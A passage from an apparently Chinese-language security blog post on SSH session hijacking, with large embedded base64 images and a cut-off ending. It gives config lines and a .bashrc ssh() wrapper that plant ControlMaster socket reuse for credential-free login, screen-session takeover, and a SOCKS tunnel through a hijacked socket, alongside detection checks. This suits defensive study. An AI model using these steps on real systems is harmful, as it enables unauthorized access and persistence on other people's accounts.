ControlPath /tmp/%r@%h:%p

ControlMaster auto

ControlPersist yes

..

*/

aaarticlea/png;base64,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" alt="" />

开启了ControlMaster模式之后，如果当前用户已经成功登录过一次目标机器(例如远程跳板机、DMZ机器)，则黑客可以利用Multiplexing技术直接"无密码"登录同样的那台服务器。

简单来说，SSH的密码验证是基于TCP Connection级别的，而不是会话Session界别的，当发生Multiplexing的时候，黑客的Session可以直接绕过任何的登录验证。

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAhoAAAA3CAIAAADFdnSwAAAJaUlEQVR4nO2d4bGsqhKFiYuAqNrZEMKJgmQIxvMDlQa6sRkZnXHWV6/ePZuxAQFZgEibf//+/f39GQA+Eh+DuzsPl3HRzdpZ6bgQvS5wHtMyD94A5AR8JC4sG7/Qfey3+76+OJdo9HZCfD4y9cMGTmB25sFbgJwAAACYAOQEAADABCAnAAAAJgA5AQAAMAHICQAAgAlATgAAAEwAckJIuxF/YV/qfLadnMelZ/fNpNNKm2yzLXeRWh8VSbD1rm8M4pXbjb51b6sLpt1c7IJZFrMspkjZmWVpLuYCfVzNj29/yJzNQANrvgfea47OoQvkZMfHJbhLPiW77FOsqxKyqexM+ohN13fqrzxiT9y4UH634UL0h0XA1ru+MUhX+njNJxKMnDizBGOMMdbEkC9r+1MxMGzxLKZTAKPmPpoYDzp01twFs0Rj0x11+/R3mesK5Oep5SQPHUOMWw+RRlgu/RTcHmKpyUN0W9GDtAVijKFFR7qRNpB8n3dUbJcldBZSaOqPojc5cWHL3Ha7Zr2bGIdH90XqSUyVispe1gamYm4vra/UiuU67A1b1xzK8LKnbgP3EDoXccF4u/Z9azdKYmirpwr0MXe4oZrfCLegMndmicZzc6kqttacSia94Lx5IGUumY8WyA9TyUl+ClygT40L21OdrqielnkjzdtR9j51gaSBcdbXXYnbwLFJw2UJnYEmo02StBlWjXIDdEGphcXtWh+j1+dnrpxYH0KIOh23fhUDZ0xYjEsisfVxYRMPNtBws5MkJyEaa9b/J9k8lhOSMxPH5UQyD4sJjl+a4yHmejkZNa/kRMp8HVgu2L59uPY11LMT4WyLWi/Sg7sNLNdf6zL+gMBx1HJSxl/+vfZrbKAZlZOLEjqDVk5sJRx9Odl/V814rI90pWs3nysnSvM85ToWwyQn+RJrIvnTerNEY9nANSlOTpyJp+VE1Ilx8z3Dejmh5i/IyUTzfiAgiO9OtsFdopl+uBC99TF4H4N70qlskJMX0C52vU1OXKhPuyoGF4pOYLqcFLnvjWysLwfIpXKkNSLLBq7R87MTOukh2dT2kkHx1lpvXi3KHZZqaN7HDOnBXHMmELMTnlJOyEjqQE6MCyHG6K3x+0uWR/CinJRd3hYJG0jLtlxSvDWhM1gf9qW20Os7czdLluSMjzlwGZeT/u6te96dkMfHhePZSbneMrTYlc1dngFIdaCSEyf2+OzSkN7ccOJXx8mZd96lX2DevyNAaOSkkVtbjfPWhrqvLdi9M/hyygFHd8VGKhBdoCEF3Su6yxI6D7s7oH9luZa6Gfu0SrRdte/7kCukHijy8XZyxNa71BhaOelf2W9KZu3g2k29ylfxiVDFwO3squYHWaKqQJKfNlfti+th82Z2UsQpm/fu/a3m3TsCJdgoDMDj4L87AeC9QE4AAABMAHICAABgApATAAAAE4CcAAAAmADkBAAAwAQgJwAAACZwjZxw3xoAcANoigC8iwvkZD+TkB5OaJi/2a8ojfQpXv5Erf5o75Wegn6PPRHhjsaiSMfZHBuTD/pyoYiFfLo/VZ/MeHOcBKEp6v2d6L8KHTMf8csiPQiTzMvjMI5g47zo21nwcUyWE67fy1/NH/WK+7ka9Et71psFe9zsOYcl6pPVRyNt7mgI/SnrQwd0nT/Mq7ihSYeDzTxgQd0U9f5OZMcqNYPmA35ZKnO9pxm9uV7T2Tj1pQSeBnfIymQHG+k5qbyi9IZU4viI6/Gbtl+cJ7hlsEiR+NUw+d/rLIBkqzhd2cd8p/TWaa7buYF0R9LRT2xhaOSEPfGwU8jNgepy5llosTP1zhddmgLuvzVHI9GqvK4psgXSCVwTePVYydZ8yC9LZf6Kp5lDc+EB7DZaNvW3DNHA59LOTqY72PAxuNRAm1+FZ5jv0WprwW1XMyTMf+7/piO5wo1TPjBxP/Q+OGNWz3q7mXP7eWZ09pEzVp9uyy5uHMtJ5ziqFmmGcNxRdjPPwjssqHLDFB05uL04dZeL8yOaIl/kysmYynzQL0tl/oKnGY05O9XpNFq2QK46zxp8DJycTD4RfX2Gg9M8w9KiUOXNgmbvYJiZNYDkec+JJRJDI0oXb7+u/9liaM9bbA6sLpLSDPjJs1qN0qO3Wocfr8lJJ/PalOSQsui4QpZzf29TlALFpviS+ahflsp8VE605iNSwBaIvpTAc7hIToSFl86x3mWWeu/JO9ORzToNk6vLqF6YATmhQ2BWqxR3xN1i2E/PPViyEXh9djLoTJO5XC8npR+KvlOQO5uiENhvii+YD/ll4cwHFruGzJWNgi2QoVICz+FYTsp29oKDjc7onO3iq5+4PS9kfaN53cfOeEJgVlKi9+Qu0iOwv//fFrtYOdlSWFdyVvODhbt2QqAZ/7mwDaiPeF1OBl6+CgLZ1rs4O+H8SonDiNuaIhsobb+SalNpzl7cxsmaS55mTpobwzQKZZyqTWrgkRRyYquh0hwHG3R3pjDuJm8vqsF4vRBDOosmcdlhidTXU/1YlujLSPNcYd1GnJ0Zb5dF8oAxm4LF6YVeTvL6TI8yIdKNHhUyWyG9xCTlKetdKrq0halOh4nzuqbINxsmUGqKUj+rNq/2jPBxjjwI5823uxiPs3eb4On88meMX/Gm0MfUCX/GBn7t2p0EtyBzNs4xPrMpfihv/gwIPI2fPGSl2MZ6d2Z+CJ1/QgDAd/KTcgIAAGA2kBMAAAATgJwAAACYAOQEAADABCAnAAAAJvAwOcE2UAAAuAdRTuDNosfXerMYM7/RcQU9LBIA8A1IcgJvFp3Ev9qbhd78ZscV+laHo2sB+AR4OYE3iwd7szjtuEJ7QkyuuBBjt4rJNCiEUI0J9gNbCusXz8kEALwNVk7gzUJ7mtah+Ud6szjpuEIpJ7nGC9+ZTG3mf1lyjtqWKj2mkPfLgtkJAJ8AIyfwZvF4bxY6806givYsG7Y2JTGwPqa5L127K2DWNgEAt6E4oB7eLHi+2puFxlwKHGafSYzKSVWPHacykBMAbqeWE3izaHieN4uTjit0i11kqkori6tNWnF5OSy1sWIXgLA1kGsMAICrqeQE3izaV7rP82Zx0nGFWk4YY742aWh+91b4lqHBbZZu3NEMAFip3WfBmwUAAIAXmPhVPLxZAADA7/KwQ1YAAADcA+QEAADABCAnT2Dh/gcAAFcCOXkCkBMAwO1ATp4A5AQAcDf/AeWfL+ZNze/qAAAAAElFTkSuQmCC" alt="" />

2. 修改ssh配置【攻击者没有root权限】

vim $HOME/.ssh/config

/*

..

ControlPath /tmp/%r@%h:%p

ControlMaster auto

ControlPersist yes

..

*/

3. 修改ssh配置【在.bashrc里封装ssh命令】

vim $HOMW/.bashrc

/*

..

ssh ()

{

    /usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";

}

..

*/

利用了Linux Bash的自定义函数的方式、SSH动态配置参数的特性实现了开启ControlMaster模式。

0x3：攻击者复用Multiplexing模式下的Socket会话进行SSH连接

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlUAAAB4CAIAAABUyZAkAAAUKUlEQVR4nO2d27HjKhBFCeuUAlI8ioZkCGU+NB96NdCgxnpYttcq171nsIAGYVogYDsH8EiG4Pt323AbNxW2Oyuf3ofBFngepxkPAPBQej8u/EJ/txb3Ouex1WgYuhPSG4Jyf9TAEzjbeAAAAAAAAAAAAAAAAIAX+ff3x4eP+nl32wQAuBK6OVChYQDAl0M3Byo0DHgU0yLrX1hufz7LAvX92uvWNfKn1bbYPRAvju+GYMhCve/2xlC8*v7+/K5fs997leyZ678bRjaOLcu7dOGYXa4FDmKPvF78pumpAhhp9DXxv9DM7B/wfPIghjL6/ZQ/ybXt478qom+rOTbufbZ29/co91sxd7+P9c70Pw24VqPfd3hhKVw5h9sYXd3OK/+vd6J1zznUu+O2y3AEUA/2SzugqFdAafQguhB0PpEbvvRuD66YSVZ3QVdFtFdIG/u95bA/nPoSlS5uerPvpK9+vIZ2M8iXDJkOXl1eIc05WnejY80CxsXuv2m7L6Cii0szHfyz+r/eLcUtx3VyaEELrluco98n7Gx8B1MvywKma80vTK4V3r3Zz88DCL77Ex+Gxa8kD1xA52uu9G7q5s577fZFCfnuSwCFsHsInI8hCEUzRezcGN2ij1SS1PLr08fKC49G9qPNS9NYKsYL/exzbz7b38mfe+6Ubmq5IHt7Pe5Z/O8buMq2QaeixPRCsjw55YNuw7LaMjiCzsWYp2ozqPrcG2Huj846K2w0hDHZ7zvV/3eC9n733XjfXDbP36p3zo+snr7Z0yn7xdmqg08Z/k//zwXVu/q8wc9//CctcaPd/peh+dL7XZ2t1RHS7/2uNnvi/kvFpYDyH/+LzJf7veRSOnUod3NTTLI/u87dpo3hAYDtm/xenH/977ojVQNfq/27K6AhW/9clnq7u/9bvTWPKbghy8nONfq7/M0bfBrWu//f3V01k8n/bJZ0L4p/d4MbgOjVwzkrzf70Lh/1f0bG1R18Ntvs/Gf0F/3di9Hrg6+D/Hszy+DyRDfB6H4ZuCH4Ygu+/6Uha/N8LWOc/L/N/vU9Pzoyehgy91un+T85/Vh/FuiEegsSubpo27NTAOSt9/CeHlcJMa7fuDUtF7NGTedrdWvXZO8UmB3ZudCWQ8d9XImaadvyf670PIQydG9YXhV/Bi/4v7qOXRNRAWbfxLPNbMzpCN/h19tXXOvvNL4hZWjeELXBs93/1NZ7vef8nfj6W8V88Bdc0/7lF77cxVukemPxfX3RR6myhPbrTvHWapha9soDlhuj1Er0O/u9pREsmtjGENqu4Tjd1a+/14cSPdNVJvFKF2AKdqOha1d2W0XHUJTn1K+Pp9SXyME0cLleti63KNyR9FNfTrVik3vdSY8j9X/3Kce/9X+dCvHplSdW0/mXCJylo6z+TEdjmU5NAYU9uVb5apDl6Nv6L0ixHr5X90ujVEh0C/wcAX847ujl9/x88CvwfAHw5dHOgQsMAgC+Hbg5UaBgA8OXQzYEKDQMAvpy3i+zweezn3W0TAAAAAAAAAE5D2/MFcBo0MAB4IuuBzPJkZqf8W91+70p7uLe9zelu71c6QXnyyIkUSrQX58RufDmobj9FsZF8q9PiPXqQpyk0MLuqn/2QgLboLeqDpeZ9UvT4OKc91DRvOkoB4GPRetrtfJi9fng98kqeKaOqu6niAMcE/MzCPa2JZiWqE114+ABPuwZQU1ZvO/HV3MDsqn5l+cCUxugN6oNJdLueoj26/bFKTdNeSwAfyiWCc1MXkKgE1h5vi8+qmovKftbRYcqLgVGOQmfObX/PAyVhVqSFMYStpLLo0up8+FQqUekYyag4Sn3qJk2D1/W7ZIxt8X/qadGVe5TJ/ZTLnhbvpgam2lkJnDN49aTsPHqT+mAS/RU9xd3ohZ9VsSkWc7/kSRHgEZwuODcE30+/vezbQvek96Fp7ILubvZ4vv1z/Vs+VUc6rNtp0aumku+dm7W812h9v56NKsd3m2GpFoE6M6Z0OrrOVBozN0no7cRnTGv+Qqc0/tt3IdWy5zyggek1YRwBm6I3qg8m0V/QU7REVweTFf+nVshdmiIA7+B0wZ25e/K9pXsqzRMm6m7SvJ1H/s1pCZtXSzrhE2VC08XLt/P/lhTyw6YzPZQoK+sLE9XbFUJikzTjtz+t+nmv+b9K2VXe28BKgcUG9lL0VvXBJHqr/7NGb/FdaoXYawngI7mkeypMplVUY2KTaotTKgO+JfY0YEoukw7ONfg/ORxRnauhRCpKGnb/F+udbYNC6/DvwPhv7x1VwjsbWCGw3sBeiN6kPqhFb5j/bIpuvFdqhTTVEsBHcrrgXGX8o/qk5CttDZ2YHMvexqtjSu8VAcMwDKIU0697XXSzzH+q/m978yTt2JnLzcdM6XRu3rnk9Vkc/23Gx7O7y9hoj9f9X8PSitS8NSBL+ZIGpgaWFmmWJgaN0dWLdfmkLHpJT/FgdOeUe2VM07SUFeCD6ZLH1nME5+Ty9MJKBvEGLhmvpJNroh/MMi8L+JWck3R44xiGONHZnnlZTBjWt2xbGYPoO5S9DsURWN7plHxIXJ8lk6alhkrRt7nBGrGdwsHs3SP1fpYzu6+B6Y1BCSw1sJJjMEdPll/pabY07+PRl1K0p1krJsAX8fYz8fj81OeURsv+9wbO3WAK8E2c1SU9mGgXwbuNOYH14fzjSvMDjQ0APge6JLgNGhsAPAi6JLgNGhsAPAi6JLgNGhsAPAi6JLgNGhsAPAi6JLgNGhsAPIgruiSWp4MK/g8AHsTpXZLcnow82xnR36jEJg/aPgH8HwA8iENdkn48I/JsZ0Z/sxKb/Qxlw5X4PwB4CL0fx39/f8iz1aM3HU9sj15RoilkZI8u2G6cD6F6i8VA03ufPMSsR7FFsfcaQwL+DwAexL+/P+TZ6tEvkmc7qMRm9H/bmHM7QVq/m9tfnTgqdclVHrKs6/8x/gOAz+Lf3x/ybPXoV8mz2aJXAk3kp7+pd7PkvbohTNLzcjo3QpnuLoH/A4AHcYn/Q57tvOilwGbWsVqr/0vuY0X7EP8HAB9E6v+QZ8uiXyTPdlCJzTb/KQ7/lzdLu5vyxm0zpJNXi5beFAQFtMaQgP8DgGfQDWEc//39JQshkGdLo18jz3ZQic3s/5TI+t2UoduS00gCUQbnJu1u1MD/AcCDYP873Ab+DwAeBF0S3AaNDQAexNsFwfn81Ofd7R0AAL6Ltzs2Pnyu+Lz7hwUAj4eeAr4PWjUA7ENPAd8HrRoA9qGngO+DVg2fB/sf7oeeQoWm+NHQquHDKOj/5f9u20W9bV9PN9+/0rXJAy1PpFCivThndM5zT9H7MNgli3Y4Qf1P7P0P5YOBLgIpyv3o8gTzfQ7pUy5tIbkTtYLg/+DBmPX/VNaDJJOTYrZDRpZfZiRdsKSp6v+ZsSsZNSaalahOdOEBzzX1FO0yT7vmHUoqagyX6vciRflqdPsD2EF9ylVJS1perwf8H1zH9OAWbtD/qz20Fp9ANReV/Vij06UXA6Mcl1LKEq8DJWFWJJQwhK2ksujS6nENTTqirETFs8pkcZT61E2aBq/rd1MCbf5vRxRwCxyC98rI24r5MeC+pii/yqwt1dtXS1EWfoAH9SlLCeZn4lcaGP4PrqX3S8t7m/6fTU5A7caU86+3f65/yyfO5e+53EsdhKHbijYPVdZofd8vJsjx3WZYKvigzncpXUn6EJ/Xp26SnDeajf/391c5/LSYrziqWg3cJupem6ctnH1asOrtTVEv4ddLUaqDyYP6lCXmBiGGj5UGhv+Da0mb/r36f6V5wqLcXW38F9svbV4t6YRPzDV9lm+TiZr8tOiiBl7LzKfu7QohsUmK8VNP0fswdIaRQS4KWAi0DjjSGtHGxHv+871NsRRYbIovRX+oFGXLxLtaIYZa0ueA6g0M/wfXckmnU2js6dWFiZe63F1lwLfEngZMyWXSwbkG/yc7btW5GkqkoqRh938yl8X/6ZOAdVSDReBLE246e2+s3toUC4G/I0W5e3dKaZYCdbI5UPwfvJOs3d+n/yevFCp0edctpryyd+zqmNL77Nfc+zAMohTTb3ZddLPMf6r+b8lBLOHQZwPVEjl1KmnH8Sz1WRz/bcZPYcv4bxnx1CiIAmprAg/5v7iMBrPe1hTVwN+RonROadHGNE1LWbdMoh+aw//B2+iSh9Hr9P+S9QniDVwyXkmn0UTvlmWuagou2am9m3R44xiGONHZnnlZTBjWt2xbGYPoEZS9DoVlGFpXUnqbFtdnyaRpAWGUz9RTbDN+NdRtGuXyTMuF8mrepdDA7Fde0BT1ZvPjUpRLKdrTrBVTIx7/7TYw/B98Hs/cdNyy4u5iWqZJNYpPykOYnOO9++wezDOb4kM5aSvqieD/AA6iLvb4YLZtCqI09BTwfdCqAWAfegr4PmjVALDP23Xa+PC54vPuHxYAAAAAAAAAAAAAAAAAADwcuXX16n0BL22fjjEcINlsTqQUYTygeceGeEPwKQafIiOXnxJnNK+Y+1LQ/XqL7YxPCbBu1d/VwFNKVNopX7HSevExsht3idCg7UdXux1nN7DXBTsBruDYoY4tx+a6R+1ATzaJ58dBFbAW4bxN6KfIyOVHc+WBTbm3qPkldsbKO1UT7CJ2aokaziJvbstHSG/cFUKDai2VjHFrnCjhkxuYvdUB3IPi/+QZSVroIg5XPO2riHL+df7cug3HhnW4lT/JTgeCBW0IUtFticstFHYUqQfFpNH3rf6vT8oQhrrxu4nKYtp7E+Nxz9WqE7kXulQ1esXOFpdj0sB72f9px1IbJQmLspElqjfuNKHBFw5uTW7HFQ2sFAjwFlSN2UzuTvZ4Qhzu2PhPE3ITk5zziZfF6MKQ+Nwmk/+bLO99CCEM3VyOTlP166LHa+vsTTQ0UXqikvG7Jifm3eb/ZO7d4L1XDharHPN9sCuUuVc0gNRDpY2PZ2pbNkkSLn+kspGlbMoVYvw9la4y1pIp2WsamD1BgBuojv/ko6x6iNgR/6cJ2ahdvB49SuCFWdxZ/90PQ5j+6LOzfMdE/sHtOKsu8XR1/9dmfHdMRu64+4lzH43eu2anufEkudv9X2SI7Ykoi2aQZNI1Okp2FCskKWaFku88ohSYNfSrGhj+D55DNqkll5mUZKHN728Snub/pgQ3uSStvE/wfwdl5NyxnijPXQyCdkY7NTttr0ibROwqJdot7D3+r1QhFwgNNs5/xmZf18Dwf/AcNP+3tE9d7k6dJIxmRYuk85/546pIvPqT3uzNkzLNf4r5VbHITXNvsVerJrz5BblWdZ1FljO6dv/XJCPXdJll/lPPPbpN0RNLqea1Lnvf/bWK2NUm2Pc6cZP/KzVas/9TTb1CaNCuFLgVTLNanVLeNak1EOBusum+9IW+kLtTFeNcdHF9jZmSz566m/deONd8WnKxJV0cY/d/c6bSq2kFlVO/IXsrqdepVkfrip6K8cUEK3W/6z6z6CXpRKuMXHSbondGWlFUOw2DkhYRO71EVbk7xUJpZ5x7WX2wKBu5n52W0WlCg4WyF++RcjsMOoUtDazU6gAg48YF6QAAAO9mexZHxhUAAAAAAAAAAAAAAAAAAAAAAAAA4Ca0TXAAAABfjXaWdfzFQmFTfV3MTAa+LieWH659CsVjAlqSWI4j3SOrz9gMHj4AAK5D66g30Yi9bnw9ckkKTahiZqpawjE5sWPCh5VEsxI10SQ6U4GzAwAAKhgVzgqBBf2/9UxgGVg75qt4NqOqzZSe0Jmczrke17TlKIT33Pb3PM4SZhWF3GTRpdXFffpZiYxHsjmz/9Pr8wWdQgCAn8WkcKYHlsZ/vp8cQPZt4TxcfaSUxk48aiFNVfZFnu0bCdNu54uGoSsLueWCiPoh4MUSNRzJ3TKBmgq2vaBTCADws5gUXtRAV/V/vrf4v9I8YVELrTb+i+2XNq+WdMInyoRi7YvkIP/8nG5VKbBeIqWA27hTvvwMQ2edm03UoqLy4P8AAOpc4v8KE3Tp1YWZz7oW2p7k6dz1Z5cl4k5m/6cKIpbUYgw6OyL3TTpgLXfL8A//BwBwAJPCmR6o6/9Vxj+qT0q+0sTMxOyrWBSjpjkZtQjaJsUaRCkmJ7suulnmP1X/J1bcKIKIeyVyLe//er+Mng2k85/Rm1D8HwBACavCWTHQaZsV5P6Hwsgm0RkUw53jkm9zdqpzkg5vHMMQJ1oUctMEEdW9DsUBnN3/bbPHNXQ9xQadQgAAuIJn7n//iCWRQ/C9TUAcAACgTrSx4d3GAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAWRzTlquoPbwsDGTl+Oa5Xy77W6HqAODp1DeSS9GIrE859VxK/ZyUa4++/OWyXwpVBwD3sY1mpELeYW256BjK5AiuROpgyvVU9UEXnRa6X/5xHMMwJDXxk2W3mqQ2m+nEOFFPufE+fEfVAcB3UOl0drXlMg2guTdRFfiWPNIu5nT1wfny3Ud5kc6QHZX5s2W3maQ2Gzk3vMXaxnLLkdyfXXUA8DUY/V+Ttk6lI8tfrJ2uvjQbuHf0c5cUj7LbTSr6v6ielDO5q87lI6oOAL6HI/7P8CCfp/mUjuyg//vWsh/yfzLf/B3ektFHVx0AfA/rqrr9OUDRO9Uf5bvBr5NOPpu2UsQGT1UfnP9lmQOU7zspe4NJarOJ9BSXdIQ1e8rAn1F1APA9FNdBrLRry6krEdbs1i7mGvVBZ+7HxMoMH73E+s2yt5ikNxuhp1jRSPz0qgMAeI0bOpn2LMx668f47rJnizbP5JFVBwDQxIM2Mm+Dk5vWvX9x2bfx5DU+5EFVBwAAAAAAAAAAAJcyah8AAIAvB/8HAAC/CP4PAOCZLKsBWVB+Dfg/AICX+A8WVErGXTgJxQAAAABJRU5ErkJggg==" alt="" />

This socket can be used to create further sessions, without credentials, even after the original user exits their session.

0x4：对抗检测方法

• 检查ssh的配置文件中，是否开启了ControlMaster模式
  • /etc/ssh/ssh_config
  • $HOME/.ssh/config
• 检查bash自定义函数中是否有ssh()劫持
  • set | grep "ssh()"

Relevant Link:

https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Multiplexing

http://unix.stackexchange.com/questions/22965/limits-of-ssh-multiplexing

http://www.anchor.com.au/blog/2010/02/ssh-controlmaster-the-good-the-bad-the-ugly/

http://www.revsys.com/writings/quicktips/ssh-faster-connections.html

6. Hijacking Active SSH Screen Sessions

ssh_user用户使用screen管理ssh会话时的情景

当ssh_user使用

screen ssh root@112.124.20.20

连接远程的"112.124.20.20"时，会在/var/run/screen有显示相应的文件。

ls -la /var/run/screen/

可以用screen -r root/来接管会话

注入screen的ssh会话，会有一个不好的地方，就是你敲的命令，会在当前正在连接的用户那里同时显示，容易被发现

0x1：对抗检测方法

• 检测/var/run/screen/是否包含screen会话，这从某种程度上算是一种可疑事件

Relevant Link:

http://0xthem.blogspot.com/2015/03/hijacking-ssh-to-inject-port-forwards.html

http://drops.wooyun.org/tips/5253

7. dynamic tunnel in existing SSH session

we can create a dynamic tunnel inside an existing master socket

lsof -i TCP:9090

ssh -O forward -D 9090 -S /tmp/root@112.124.20.20\:22 %h

lsof -i TCP:9090

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAhcAAAA2CAIAAAD71CylAAAME0lEQVR4nO2da5LrKAyFvS4vyFWzG6+GzbCYzA8HEOgIBHEn6dvnq6mpvgTzNBIII7b//vtv+1sc4ZEIx6cLQ8i3c0YOF9Ll72kRQggh90EtQgghZB1qEUIIIetQixBCCFmHWoQQQsg6b9Ai6RsPfuJBCCH/HD+tRfYzXuoj/9H+kBBf4EqNk4PjuevIMvAKW9FVZ3w84jn/3ACjRnNJxHM/4+DhlNELenrP33PWDT3x+CB3kUOTj+jiM8Rzb1puWC04TYFt4o9JCPFypxZB4u6MSViMhOERnjH38sxWhNMRsqA/QhryR8hj/4o5FLidzFeeGyaqajTF1WbOSq3WvWT0o6Qsnk2dGqd05qVnSpOlAolOxsk+HxHxilLLfTATkxAygdAi15wsnsc1Y5PjTE1SdWA9fRTCPRw5upAL5uxvPyMW6EjQKwEjhGFZrlQ5plrKGuc5vyhWdTjxjA8p3x4i5bY99FRe1eiK7JHaL2mRUqYQY683q0XCvDadnMvX/WjJ7r3qSakJmpxkAvmZ5uHZmISQCZq1yBGSfDmybUEsJsoSQAdaa5FwXGJU/QqFozVrb59u9JKRpvxn/ltKEzkjTgI01S5V7YyPeO7lsePIU2e51igFq4WRrpFTizQWIEf8xlAjFXy34+5Yi7gTqIS1ma/4QcbRTVetMFLtYL/7YxJCJlBapBZ59b+f4xkGbl0tEg6PFrEsP/sZ8Ry5txapyy/LnEuyC80iE7oip1+FJWbfavu+Dmmm+U5blhCOVUmOEM/dO0fWdW81kNVxTi3S1rOq2f1axLs8KtsqMfZ1gz8mIcTNO7SIudWpLDBIXlwTR6v8ncVHevpaTzTRpJrYJrSInMJDFeWoEapiOFIjDUyENqYQzMV4UYus5d4yb9GaL8PQTkWLFiG3MdAi9dBKQw4GSqFZbCiduTiU7M1PZ9TyU5hlxJY7TPMqVAhKVB3h+h5IpFmm1s+SWFpE7OeLcgysc7Jg/n2RI6SVnIM6Xr2DnPsFdtwHtUjdSqXQRoE6TSeXffsZsuEuqPfPH5MQMqZokb3ZZN11cD9wQ5/lyi99jVm22Jlopt6tCcW9Rfww5KlA6IDnl751omVl8PwO+AhXutIs8hDGIpW7uZjwa5FiD+wxbs9mX6Fuu/rx6fk4zH0ctW2OKtT0uwz3RUDJ0Rvij0kImeDPnjr8FUbwM4aDX6ASQr6Zv+cBhfeLEELIffw9LUIIIeQ+qEUIIYSsQ